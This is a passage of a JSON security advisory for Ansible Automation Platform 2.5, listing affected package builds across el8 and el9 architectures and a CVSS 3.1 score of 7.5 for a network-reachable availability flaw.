"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
